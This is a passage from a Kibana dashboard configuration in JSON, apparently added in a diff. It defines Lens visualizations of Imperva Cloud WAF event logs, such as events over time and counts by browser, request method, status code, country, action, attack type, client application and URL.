"#6092C0", + "layerId": "abd9e58c-abec-44f0-9d95-3768df9b8930", + "layerType": "data", + "metricAccessor": "eed0424d-6de8-4527-a2d6-fd4bfe72ac10" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "6d748ea7-1436-40ad-800c-8e0c636740ad", + "w": 7, + "x": 34, + "y": 9 + }, + "panelIndex": "6d748ea7-1436-40ad-800c-8e0c636740ad", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-abd9e58c-abec-44f0-9d95-3768df9b8930", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "528c259d-3bb8-4791-8a19-a37b6624b556", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "abd9e58c-abec-44f0-9d95-3768df9b8930": { + "columnOrder": [ + "eed0424d-6de8-4527-a2d6-fd4bfe72ac10" + ], + "columns": { + "eed0424d-6de8-4527-a2d6-fd4bfe72ac10": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Domains", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "imperva_cloud_waf.event.extensions.source.service_name" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "528c259d-3bb8-4791-8a19-a37b6624b556", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "abd9e58c-abec-44f0-9d95-3768df9b8930", + "layerType": "data", + "metricAccessor": "eed0424d-6de8-4527-a2d6-fd4bfe72ac10" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "5e840a5e-01ae-4a23-8893-f2f875b81c5c", + "w": 7, + "x": 41, + "y": 9 + }, + "panelIndex": "5e840a5e-01ae-4a23-8893-f2f875b81c5c", + "title": "", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-0e52361c-137e-4c14-8b62-af92a36c86ca", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5bfe5e3b-12af-45dd-82eb-1213ec1fb70d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0e52361c-137e-4c14-8b62-af92a36c86ca": { + "columnOrder": [ + "4b82af58-c3ef-443b-be31-0a06235598e8", + "e51f3f8f-f4ba-4562-a06d-335ac3ba79c1" + ], + "columns": { + "4b82af58-c3ef-443b-be31-0a06235598e8": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e51f3f8f-f4ba-4562-a06d-335ac3ba79c1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "5bfe5e3b-12af-45dd-82eb-1213ec1fb70d", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "e51f3f8f-f4ba-4562-a06d-335ac3ba79c1" + ], + "layerId": "0e52361c-137e-4c14-8b62-af92a36c86ca", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "4b82af58-c3ef-443b-be31-0a06235598e8" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "97624fe6-c73f-4388-8c25-125eef8ff15e", + "w": 38, + "x": 10, + "y": 18 + }, + "panelIndex": "97624fe6-c73f-4388-8c25-125eef8ff15e", + "title": "Events Over Time [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "423722ed-ae37-4133-a7b7-305a907f8b96", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e4b8b120-7757-437d-83ad-3e49ee5ccaa8": { + "columnOrder": [ + "0fc3d91c-9625-4c73-bd40-f847da073470", + "2b258188-ac41-424a-aefa-1a9f1fca9fa1" + ], + "columns": { + "0fc3d91c-9625-4c73-bd40-f847da073470": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Browser Type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2b258188-ac41-424a-aefa-1a9f1fca9fa1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "destination.process.name" + }, + "2b258188-ac41-424a-aefa-1a9f1fca9fa1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "423722ed-ae37-4133-a7b7-305a907f8b96", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "2b258188-ac41-424a-aefa-1a9f1fca9fa1" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "0fc3d91c-9625-4c73-bd40-f847da073470" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "121ba06e-38ec-4a78-8cc8-d5e592a2362c", + "w": 24, + "x": 0, + "y": 33 + }, + "panelIndex": "121ba06e-38ec-4a78-8cc8-d5e592a2362c", + "title": "Events by Browser Type [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3bff65e1-141b-4e3e-8a07-16b93d6abb53", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e4b8b120-7757-437d-83ad-3e49ee5ccaa8": { + "columnOrder": [ + "0fc3d91c-9625-4c73-bd40-f847da073470", + "2b258188-ac41-424a-aefa-1a9f1fca9fa1" + ], + "columns": { + "0fc3d91c-9625-4c73-bd40-f847da073470": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Request Type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2b258188-ac41-424a-aefa-1a9f1fca9fa1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.request.method" + }, + "2b258188-ac41-424a-aefa-1a9f1fca9fa1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "3bff65e1-141b-4e3e-8a07-16b93d6abb53", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "2b258188-ac41-424a-aefa-1a9f1fca9fa1" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "0fc3d91c-9625-4c73-bd40-f847da073470" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "ecd8148f-256e-4fb0-998c-7c5f8ee0f836", + "w": 24, + "x": 24, + "y": 33 + }, + "panelIndex": "ecd8148f-256e-4fb0-998c-7c5f8ee0f836", + "title": "Events by Request Type [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8aa8e1de-41cc-47b8-b258-68aca05b397e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e4b8b120-7757-437d-83ad-3e49ee5ccaa8": { + "columnOrder": [ + "0fc3d91c-9625-4c73-bd40-f847da073470", + "2b258188-ac41-424a-aefa-1a9f1fca9fa1" + ], + "columns": { + "0fc3d91c-9625-4c73-bd40-f847da073470": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "HTTP Status Code", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2b258188-ac41-424a-aefa-1a9f1fca9fa1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" + }, + "2b258188-ac41-424a-aefa-1a9f1fca9fa1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "8aa8e1de-41cc-47b8-b258-68aca05b397e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "e4b8b120-7757-437d-83ad-3e49ee5ccaa8", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "2b258188-ac41-424a-aefa-1a9f1fca9fa1" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "0fc3d91c-9625-4c73-bd40-f847da073470" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "b5bdb40e-2ce5-4e7f-8bdd-ed0e6ac46a8e", + "w": 24, + "x": 0, + "y": 48 + }, + "panelIndex": "b5bdb40e-2ce5-4e7f-8bdd-ed0e6ac46a8e", + "title": "Events by HTTP Status Code [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ef914720-960e-4e8e-ba49-d46dba28d267", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "47dffbaa-cffc-4216-8119-6a7a56cadffd", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ef914720-960e-4e8e-ba49-d46dba28d267": { + "columnOrder": [ + "327ed0b3-b769-455a-a89a-81b6e85e307c", + "b934ef88-7fe9-4c40-b1a8-55033190e8ee" + ], + "columns": { + "327ed0b3-b769-455a-a89a-81b6e85e307c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Country Code", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "b934ef88-7fe9-4c40-b1a8-55033190e8ee", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "source.geo.country_iso_code" + }, + "b934ef88-7fe9-4c40-b1a8-55033190e8ee": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "47dffbaa-cffc-4216-8119-6a7a56cadffd", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "b934ef88-7fe9-4c40-b1a8-55033190e8ee" + ], + "layerId": "ef914720-960e-4e8e-ba49-d46dba28d267", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "327ed0b3-b769-455a-a89a-81b6e85e307c" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "561ae70e-7755-4934-96b9-f8300d0d78a2", + "w": 24, + "x": 24, + "y": 48 + }, + "panelIndex": "561ae70e-7755-4934-96b9-f8300d0d78a2", + "title": "Events by Country Code [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ef914720-960e-4e8e-ba49-d46dba28d267", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f1497cde-4c0c-40c4-9e3e-342948b78ed4", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ef914720-960e-4e8e-ba49-d46dba28d267": { + "columnOrder": [ + "327ed0b3-b769-455a-a89a-81b6e85e307c", + "b934ef88-7fe9-4c40-b1a8-55033190e8ee" + ], + "columns": { + "327ed0b3-b769-455a-a89a-81b6e85e307c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Action", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "b934ef88-7fe9-4c40-b1a8-55033190e8ee", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "event.action" + }, + "b934ef88-7fe9-4c40-b1a8-55033190e8ee": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "f1497cde-4c0c-40c4-9e3e-342948b78ed4", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "b934ef88-7fe9-4c40-b1a8-55033190e8ee" + ], + "layerId": "ef914720-960e-4e8e-ba49-d46dba28d267", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "327ed0b3-b769-455a-a89a-81b6e85e307c" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "282c6944-380f-44c1-9f22-4459367b204b", + "w": 24, + "x": 0, + "y": 63 + }, + "panelIndex": "282c6944-380f-44c1-9f22-4459367b204b", + "title": "Events by Action [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ef914720-960e-4e8e-ba49-d46dba28d267", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e255721e-3b2f-414a-bb8a-899b273c20cb", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ef914720-960e-4e8e-ba49-d46dba28d267": { + "columnOrder": [ + "327ed0b3-b769-455a-a89a-81b6e85e307c", + "b934ef88-7fe9-4c40-b1a8-55033190e8ee" + ], + "columns": { + "327ed0b3-b769-455a-a89a-81b6e85e307c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Attack Type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "b934ef88-7fe9-4c40-b1a8-55033190e8ee", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "imperva_cloud_waf.event.name" + }, + "b934ef88-7fe9-4c40-b1a8-55033190e8ee": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "e255721e-3b2f-414a-bb8a-899b273c20cb", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "b934ef88-7fe9-4c40-b1a8-55033190e8ee" + ], + "layerId": "ef914720-960e-4e8e-ba49-d46dba28d267", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "327ed0b3-b769-455a-a89a-81b6e85e307c" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "88c0a4cb-189c-4ddb-835b-4db106ec5663", + "w": 24, + "x": 24, + "y": 63 + }, + "panelIndex": "88c0a4cb-189c-4ddb-835b-4db106ec5663", + "title": "Events by Attack Type [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d2d78c16-fd43-4762-b0f1-a60659cff9b3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3312999c-205a-4d09-bb15-dc5818d3e852", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d2d78c16-fd43-4762-b0f1-a60659cff9b3": { + "columnOrder": [ + "dfe0fe59-38f3-40f7-8edc-9682e8fb3b6c", + "a3c1d47e-f2bd-435a-9d68-aab085315d61" + ], + "columns": { + "a3c1d47e-f2bd-435a-9d68-aab085315d61": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "dfe0fe59-38f3-40f7-8edc-9682e8fb3b6c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Client Application", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a3c1d47e-f2bd-435a-9d68-aab085315d61", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "imperva_cloud_waf.event.extensions.device.custom_string6" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "3312999c-205a-4d09-bb15-dc5818d3e852", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "dfe0fe59-38f3-40f7-8edc-9682e8fb3b6c" + }, + { + "columnId": "a3c1d47e-f2bd-435a-9d68-aab085315d61" + } + ], + "layerId": "d2d78c16-fd43-4762-b0f1-a60659cff9b3", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "e1b971a5-c7f3-4c2c-a27c-d2a26f40a806", + "w": 24, + "x": 0, + "y": 78 + }, + "panelIndex": "e1b971a5-c7f3-4c2c-a27c-d2a26f40a806", + "title": "Top 10 Client Application [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "78ef208b-b924-4bd2-8580-5a0deb623228", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "dfd810b0-0b4a-4b8c-82f9-dda8ece262fb": { + "columnOrder": [ + "ca43cfbc-6a9c-455a-93c5-a53670f4ad64", + "37cdfacb-63b9-427c-a43d-054b859520a8" + ], + "columns": { + "37cdfacb-63b9-427c-a43d-054b859520a8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "ca43cfbc-6a9c-455a-93c5-a53670f4ad64": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "URL", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "37cdfacb-63b9-427c-a43d-054b859520a8", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "url.original" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "78ef208b-b924-4bd2-8580-5a0deb623228", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "ca43cfbc-6a9c-455a-93c5-a53670f4ad64" + }, + { + "columnId": "37cdfacb-63b9-427c-a43d-054b859520a8" + } + ], + "layerId": "dfd810b0-0b4a-4b8c-82f9-dda8ece262fb", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": 